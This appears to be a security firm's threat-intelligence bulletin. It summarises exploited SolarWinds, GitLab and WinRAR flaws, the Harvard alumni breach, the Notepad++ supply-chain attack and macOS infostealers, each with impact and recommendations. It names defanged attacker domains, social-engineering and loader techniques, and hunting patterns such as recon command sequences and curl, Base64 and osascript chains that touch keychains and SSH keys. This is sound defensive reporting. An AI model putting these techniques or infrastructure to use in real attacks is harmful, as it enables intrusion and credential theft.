Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
CISA Orders Federal Agencies to Patch Actively Exploited SolarWinds Web Help Desk Vulnerability
CISA added CVE-2025-40551 to the Known Exploited Vulnerabilities catalog on February 3, 2026, ordering federal civilian agencies to patch by Friday. The critical vulnerability with severity score 9.8 affects SolarWinds Web Help Desk, an IT service management platform used for ticketing and asset tracking. Horizon3.ai researcher Jimi Sebree discovered and reported the vulnerability to SolarWinds on December 5, 2025. The flaw bypasses fixes implemented for CVE-2024-28986, a 2024 vulnerability that was also added to CISA’s KEV catalog. SolarWinds released patches in Web Help Desk version 2026.1 addressing CVE-2025-40551 and several other recently discovered security bugs.
Impact: The vulnerability enables unauthenticated remote code execution on systems running vulnerable Web Help Desk versions. Active exploitation allows attackers to compromise IT service management platforms handling sensitive support tickets, asset inventories, and internal helpdesk operations. Organizations using Web Help Desk for centralized IT support face risks of unauthorized access to ticketing systems containing employee information, system configurations, and corporate infrastructure details. The bypass of previous security fixes demonstrates persistent attacker interest in this platform as an entry point into enterprise networks.
Recommendation: Organizations running SolarWinds Web Help Desk should upgrade to version 2026.1 or later. Federal civilian agencies must complete patching by February 7, 2026 per CISA directive. Audit Web Help Desk installations for signs of compromise including unauthorized user accounts, configuration changes, or suspicious access patterns. Review Web Help Desk access logs for unauthorized authentication attempts or unusual administrative activity occurring before patch deployment.
ShinyHunters Breaches Harvard University Alumni Database Exposing 115,000 Donor Records
Hudson Rock researchers disclosed a data breach affecting Harvard University’s Alumni Affairs and Development department on February 4, 2026, attributed to the ShinyHunters cybercriminal group operating as part of the “Scattered LAPSUS$ Hunters” collective. The breach exposed approximately 115,000 sensitive records containing detailed donor information, wealth classifications, and admissions coordination data. The exposed database included comprehensive tracking of alumni, spouses, parents, and current students with entries categorized by relationship type and financial contribution levels. The leak revealed “Lifetime Recognition” donation amounts for high-profile donors including Mark Zuckerberg ($603 million), Michael Bloomberg ($421 million), and Steven Ballmer ($102 million), along with home addresses, private email addresses, and family member tracking. Documents showed coordination between fundraising and admissions departments through “Admissions Holds” that pause donor solicitation when family members apply to the university. The attack likely used voice phishing targeting administrative staff with access to the alumni database. Security analysts assess ShinyHunters employed deepfake voice technology to impersonate IT support staff, directing victims to fake Single Sign-On portals that captured credentials in real-time through man-in-the-middle techniques. Attackers convinced victims to approve multi-factor authentication push notifications or provide one-time passwords, allowing session token hijacking that bypassed security controls without triggering alerts. Once inside the university’s systems, the group moved laterally across Microsoft 365, SharePoint, and Salesforce platforms, searching for files containing terms like “confidential,” “stewardship,” and “proposal.”
Impact: The breach exposes the private financial relationships and personal details of the world’s most influential academic donor base, creating a high-value target environment for extortion, social engineering, and identity theft. The consolidated database provides attackers with wealth classifications, residential addresses, private contact information, and family relationship mapping for ultra-high-net-worth individuals. The leak enables granular profiling of donor cultivation strategies and relationship management approaches, potentially compromising ongoing fundraising campaigns and donor relationships. The centralization of sensitive data in cloud platforms demonstrates a systemic vulnerability affecting higher education institutions managing major donor portfolios.
Recommendation: Higher education institutions should implement phishing-resistant multi-factor authentication for all administrative staff accessing donor databases and development systems. Deploy Zero Trust architecture requiring continuous verification for access to sensitive alumni and development data. Conduct security awareness training focused on voice phishing detection for administrative personnel. Segment alumni and development databases from general institutional systems to limit lateral movement following credential compromise. Implement data loss prevention controls monitoring for bulk exfiltration of sensitive files.
🚩 Notepad++ Supply Chain Attack Deployed Three Distinct Infection Chains Over Four Months
Kaspersky researchers disclosed a supply chain attack targeting Notepad++ text editor update infrastructure that operated from July through October 2025. On February 2, 2026, Notepad++ developers announced their update infrastructure was compromised due to a hosting provider breach from June to September 2025, with attackers maintaining access until December 2025. The campaign targeted approximately a dozen machines belonging to individuals in Vietnam, El Salvador, and Australia, along with government, financial, and IT service provider organizations. Attackers continuously changed their attack methods, server addresses, and malware throughout the operation. Three infection chains were identified: Chain 1 ran from late July through early August using fake update files that collected system information and uploaded it to temp[.]sh before deploying Cobalt Strike backdoor through exploitation of old ProShow software vulnerabilities. Chain 2 operated from mid-September through late September with modified update files that expanded information collection and used legitimate Lua interpreter software to load and execute malicious code, also delivering Cobalt Strike. Chain 3 deployed in October using standard malware installation techniques to drop the Chrysalis backdoor, with Rapid7 observing additional Cobalt Strike deployment. Attackers rotated between different domains including cdncheck.it[.]com, self-dns.it[.]com, safe-dns.it[.]com, and api.wiresguard[.]com throughout the campaign.
Impact: The compromise of Notepad++ update infrastructure enabled targeted attacks against high-profile organizations worldwide through a trusted software distribution channel. Attackers demonstrated sophistication by drastically changing infection chains monthly to evade detection while spreading implants in a targeted manner. The deployment of multiple payloads including Cobalt Strike Beacon and Chrysalis backdoor provided persistent remote access for espionage and data theft operations. Chain 3’s execution techniques match patterns associated with Chinese-speaking threat actors. The targeted nature of infections affecting government, financial, and IT service provider organizations suggests intelligence collection objectives.
Recommendation: Organizations using Notepad++ should verify software integrity and investigate systems for compromise indicators. Review network traffic for DNS resolutions to temp[.]sh domain and HTTP requests with temp[.]sh URLs embedded in User-Agent headers. Hunt for suspicious command sequences including whoami, tasklist, systeminfo, and netstat -ano executed in rapid succession. Block identified malicious domains. Search for files dropped to %appdata%\ProShow, %APPDATA%\Adobe\Scripts, and %appdata%\Bluetooth directories. Monitor for LOLC2 service connections, local reconnaissance command sequences, and persistence through Windows Registry Run keys.
CISA Warns of Actively Exploited Five-Year-Old GitLab SSRF Vulnerability
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2021-39935 to its Known Exploited Vulnerabilities Catalog on February 3, 2026, warning that threat actors are actively exploiting this server-side request forgery (SSRF) flaw in GitLab Community and Enterprise Editions. Originally patched by GitLab in December 2021, the vulnerability allows unauthenticated attackers to access the CI Lint API and force GitLab servers to make unauthorized requests to internal or external resources. Despite being addressed over three years ago, recent reports indicate renewed exploitation activity targeting unpatched GitLab instances exposed to the internet. The flaw stems from improper validation of user-supplied URLs during continuous integration configuration checks. Attackers can craft malicious API requests without authentication to conduct internal network scanning, expose sensitive metadata services in cloud environments, leak credentials, or exploit secondary vulnerabilities in connected systems. With over 49,000 GitLab instances currently exposed online (according to Shodan), and GitLab’s platform serving more than 30 million registered users including 50% of Fortune 100 organizations, the attack surface remains significant for organizations running outdated versions.
Impact: Unauthenticated SSRF exploitation in GitLab poses severe risks to development and CI/CD pipeline environments. Successful attacks can expose cloud metadata services containing authentication tokens and configuration secrets, enable lateral movement into internal networks, facilitate supply chain compromises, and serve as initial intrusion vectors for ransomware or cryptomining campaigns. The vulnerability’s exploitation in DevOps infrastructure creates downstream risks affecting source code repositories, build systems, and production deployment pipelines across affected organizations.
Recommendation: Apply GitLab’s security patches to the latest fixed versions as specified in GitLab’s official security advisory addressing CVE-2021-39935. Review and limit access to the CI Lint API, especially for GitLab instances accessible from public networks. Implement authentication requirements and IP whitelisting where possible.
🚩 Microsoft Reports Infostealer Campaigns Expanding Beyond Windows, with macOS-Targeted Stealers
Microsoft published research reporting that infostealer threats are increasingly targeting macOS environments, leveraging cross-platform languages like Python, and abusing trusted platforms and utilities to deliver credential-stealing malware. Microsoft Defender Experts observed macOS-targeted campaigns since late 2025 using social engineering, including ClickFix-style prompts and malicious DMG installers, to deploy macOS stealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS). Microsoft reports these campaigns commonly use fileless execution, native macOS utilities, and AppleScript automation to collect credentials, session data, and secrets from browsers, keychains, and developer environments, then exfiltrate and attempt to remove traces. In parallel, Microsoft observed Python-based stealer campaigns distributed via phishing that collect credentials, cookies, authentication tokens, payment data, and crypto wallet data, with examples including PXA Stealer activity in October and December 2025 that used persistence via registry Run keys or scheduled tasks and exfiltration via Telegram. Microsoft also describes platform abuse campaigns, including WhatsApp abuse in November 2025 to propagate malware and ultimately deliver Eternidade Stealer, and a September 2025 malvertising and SEO poisoning campaign using a fake Crystal PDF installer that establishes persistence via scheduled tasks and steals browser data.
Impact: These activity patterns increase the likelihood of credential theft and session hijacking across email, banking, social media, and corporate cloud services, and can create direct financial exposure through cryptocurrency wallet theft. Microsoft notes that compromise of developer credentials can enable access to source code, cloud infrastructure, and potentially customer data, and that broader infostealer compromise can lead to follow-on outcomes including unauthorized internal access, data breaches, business email compromise, supply chain abuse, and ransomware activity.
Recommendation: Recommendations include strengthening user awareness against malvertising redirect chains, fake installers, ClickFix-style copy and paste prompts, and discouraging installation of unsigned DMGs or unofficial “terminal-fix” utilities. Teams should monitor for suspicious macOS Terminal activity and fileless execution patterns involving utilities and flows called out by Microsoft, including curl, Base64 decoding, gunzip, osascript, and JXA, and alert on abnormal access to Keychain, browser credential stores, and developer and cloud artifacts (for example SSH keys and cloud credentials). Where Microsoft Defender is in use, enable cloud-delivered protection, run EDR in block mode, enable network and web protection, enable tamper protection, and consider Microsoft’s recommended attack surface reduction rules such as blocking potentially obfuscated scripts and blocking downloaded JS or VBScript from launching executable content.
🚩 Check Point Research reports Amaranth-Dragon rapidly weaponized a WinRAR path traversal flaw (CVE-2025-8088) in targeted Southeast Asia Espionage Campaigns
Check Point Research reported activity it tracks as “Amaranth-Dragon,” describing highly targeted cyber-espionage campaigns during 2025 against government and law enforcement agencies in Southeast Asia. The report describes targeting across multiple countries in the region, including Cambodia, Thailand, Laos, Indonesia, Singapore, and the Philippines, with lure themes aligned to local geopolitical events. Less than ten days after CVE-2025-8088 was disclosed (August 8, 2025), Check Point Research observed Amaranth-Dragon introduce malicious RAR archives into its campaigns to exploit the WinRAR vulnerability, described as a Windows WinRAR path traversal issue that can enable arbitrary code execution via crafted archive files. Check Point Research describes the technique as allowing attackers to drop files into the Startup folder for persistence and indirect execution on reboot, and also reports use of legitimate hosting services such as Dropbox, DLL sideloading, and a custom “Amaranth Loader” that retrieves an AES key (from Pastebin or actor-controlled servers in some cases), decrypts an encrypted payload, and executes it in memory, most commonly deploying the Havoc C2 framework. The report also describes “TGAmaranth RAT,” a Telegram-based remote access trojan using a Telegram bot as command and control and featuring anti-EDR and anti-AV capabilities. The initial delivery method is described as uncertain, though the targeted nature suggests malicious emails with weaponized attachments.
Impact: Organizations with Windows endpoints where WinRAR is installed face increased risk if targeted users open weaponized RAR archives themed around relevant local or organizational events. The activity described can enable persistent footholds and follow-on remote access through custom loaders and tooling, while leveraging legitimate cloud services and geo-restricted infrastructure to limit broader exposure and reduce visibility, which can hinder detection and incident scoping.
Recommendation: Recommendations include prioritizing remediation of CVE-2025-8088 by ensuring Windows WinRAR is updated to a fixed release per vendor guidance, and reducing organizational dependence on WinRAR where feasible through managed archive handling and attachment controls.
Sign up here!
To receive the TIGR Threat Watch email bulletin and critical vulnerability notifications, simply complete the form below.
Follow on Twitter
@SRA_ThreatWatch will keep you up to date with the most recent posts on your social media feed.
Subscribe to the RSS
Just copy and add this link to your RSS app and be notified immediately when new intel is posted.
How to use RSS
Following the RSS feed is easy. RSS can be added in your Outlook desktop app, and there are many free RSS readers available for your mobile device.
To follow using Outlook:
- In Outlook, right-click the RSS Feeds folder and choose Add a New RSS Feed.
- In the New RSS Feed dialog box, enter the URL of the RSS Feed: https://sra.io/category/tigr/feed
(click here for detailed instructions and additional options for Outlook)
Popular mobile RSS reader apps include:
- Feedly
- NewsBlur
- RSS Reader
- Inoreader
After installing your preferred RSS reader, you will be able to add this feed by entering the URL: https://sra.io/category/tigr/feed
Threat Bulletin Archive
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.